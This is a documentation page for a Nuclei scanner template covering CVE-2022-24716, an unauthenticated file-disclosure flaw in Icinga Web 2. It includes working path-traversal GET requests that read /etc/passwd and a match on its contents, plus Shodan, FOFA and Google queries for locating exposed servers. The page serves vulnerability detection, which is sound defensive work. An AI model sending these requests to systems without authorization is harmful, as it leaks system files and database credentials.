Skip to content
Nuclei Templates

Icinga Web 2 - Arbitrary File Disclosure

ID: CVE-2022-24716

Severity: high

Author: DhiyaneshDK

Tags: cve,cve2022,packetstorm,icinga,lfi

Description

Section titled “Description”

Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including icingaweb2 configuration files with database credentials.

YAML Source

Section titled “YAML Source”
id: CVE-2022-24716


info:
  name: Icinga Web 2 - Arbitrary File Disclosure
  author: DhiyaneshDK
  severity: high
  description: |
    Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.
  impact: |
    The vulnerability can lead to unauthorized access to sensitive information, potentially exposing credentials, configuration files, and other sensitive data.
  remediation: This issue has been resolved in versions 2.9.6 and 2.10 of Icinga Web 2. Database credentials should be rotated.
  reference:
    - https://github.com/JacobEbben/CVE-2022-24716/blob/main/exploit.py
    - http://packetstormsecurity.com/files/171774/Icinga-Web-2.10-Arbitrary-File-Disclosure.html
    - https://github.com/Icinga/icingaweb2/commit/9931ed799650f5b8d5e1dc58ea3415a4cdc5773d
    - https://github.com/Icinga/icingaweb2/security/advisories/GHSA-5p3f-rh28-8frw
    - https://security.gentoo.org/glsa/202208-05
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-24716
    cwe-id: CWE-22
    epss-score: 0.25375
    epss-percentile: 0.96582
    cpe: cpe:2.3:a:icinga:icinga_web_2:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: icinga
    product: icinga_web_2
    shodan-query:
      - title:"Icinga"
      - http.title:"icinga"
      - http.title:"icinga web 2 login"
    fofa-query:
      - title="icinga web 2 login"
      - title="icinga"
    google-query:
      - intitle:"icinga"
      - intitle:"icinga web 2 login"
  tags: cve,cve2022,packetstorm,icinga,lfi


http:
  - method: GET
    path:
      - "{{BaseURL}}/lib/icinga/icinga-php-thirdparty/etc/passwd"
      - "{{BaseURL}}/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd"
      - "{{BaseURL}}/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd"


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - text/plain


      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fedf3b5cf90891c9586744abe2f491b82ec34faefb8306f43ce9f099fadebc690221009a30038bb1238415d36d03e5774adcef76b62f4ad7fe2c2303743ceb0a32c990:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-24716.yaml"

View on Github